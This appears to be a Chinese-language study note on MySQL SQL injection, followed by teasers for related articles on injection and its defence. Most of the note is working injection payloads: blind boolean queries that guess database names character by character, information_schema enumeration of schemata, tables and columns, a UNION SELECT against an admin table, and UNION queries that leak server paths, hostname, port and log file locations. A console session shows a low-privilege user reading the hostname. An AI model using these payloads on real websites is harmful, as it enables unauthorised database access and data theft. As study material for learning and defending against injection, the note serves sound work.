第四天:
//猜解當前資料庫長度、及庫名and length((database()))=5 //當前資料庫長度(資料庫名:sqlin)
and ascii(substring((database()),1,1))=115 //猜解當前資料庫第一位,ascii(s)=115
and ascii(substring((database()),2,1))=113
//判斷資料庫個數
and (select count(schema_name) from information_schema.schemata)=6
//判斷所有資料庫長度
and length((select distinct schema_name from information_schema.schemata limit 0,1))=18 //等同於下一條
and length((select distinct schema_name from `information_schema`.schemata limit 0,1))=18 //第乙個資料庫
and length((select distinct schema_name from `information_schema`.schemata limit 1,1))=5
and length((select distinct schema_name from `information_schema`.schemata limit 2,1))=17
and length((select distinct schema_name from `information_schema`.schemata limit 3,1))=5
and length((select distinct schema_name from `information_schema`.schemata limit 4,1))=9
and length((select distinct schema_name from `information_schema`.schemata limit 5,1))=4
and length((select distinct schema_name from `information_schema`.schemata limit 6,1))>0 //不存在第7個資料庫
//猜解所有資料庫庫名
and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 0,1),1,1))<79 //第乙個資料庫名的第乙個字元ascii值
and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 1,1),1,1))<79
and length((select table_name from information_schema.tables where table_schema=0x73716c696e limit 0,1))=4 //第乙個資料庫的第乙個表名的長度
and ascii(substring((select column_name from information_schema.columns where table_schema=0x73716c696e and table_name=0x6e657773 limit 0,1),1,1))=105 (i)
and ascii(substring((select column_name from information_schema.columns where table_schema=0x73716c696e and table_name=0x6e657773 limit 0,1),2,1))=100 (d) 備:
and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
and ascii(substring ((0x41),1,1))=0x41 //抓包抓到的語句,substring後有乙個空格,導致這段注入無效,可能是工具bug
union select variable_name,2,3 from information_schema.global_variablesunion select variable_value,2,3 from information_schema.global_variables where variable_name=0x76657273696f6e //version版本,直接通過version()也可以獲取
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x62617365646972 //basedir資料庫的路徑
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x44415441444952 //datadir資料庫檔案存放路徑
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x686f73746e616d65 //hostname伺服器主機名
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x504f5254 //port資料庫埠
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x5049445f46494c45 //pid_file程序pid檔案路徑
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x47454e4552414c5f4c4f475f46494c45 //general_log_file日誌檔案路徑
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x4348415241435445525f5345545f534552564552 //character_set_server字元編碼
mysql> show variables; //或者在互動模式中檢視所有全域性變數
低許可權使用者也可以訪問:
mysql> show databases;
+--------------------+
| database |
+--------------------+
| information_schema |
| test |
+--------------------+
2 rows in set (0.00 sec)
mysql> use information_schema;
database changed
mysql> select variable_value from global_variables where variable_name=0x686f73746e616d65;
+----------------+
| variable_value |
+----------------+
| win7-pc |
+----------------+
1 row in set (0.00 sec)
WEB安全 php mysql5注入防禦(一)
注入利用函式 mysql5.0及以上版本預設有乙個information schema資料庫,其中儲存有所有資料庫表名和列名資訊。可以開啟phpmyadmin,分別在information schema資料庫的tables表和columns表檢視所有表資訊,了解下面的注入語句的本質。informat...
WEB 安全之 SQL注入《一》 盲注
sql注入是乙個比較 古老 的話題,雖然現在存在這種漏洞的站點比較少了,我們還是有必要了解一下它的危害,及其常用的手段,知己知彼方能百戰不殆。進攻與防守相當於矛和盾的關係,我們如果能清楚了解 攻擊的全過程,就可以更好的預防類似情況的出現。sql注入原理主要是攻擊者,利用被攻擊頁面的一些漏洞 通常都是...
WEB 安全之 SQL注入《一》 盲注
sql注入原理主要是攻擊者,利用被攻擊頁面的一些漏洞 通常都是程式設計師粗心大意造成的 改變資料庫執行的sql語句,從而達到獲取 非授權資訊 的目的。下面自己搭建了實驗環境用於測試。首先交待一下,測試環境 開發語言為 asp.net 資料庫使用的 msql 測試頁面模擬了普通的新聞頁面,url裡接受...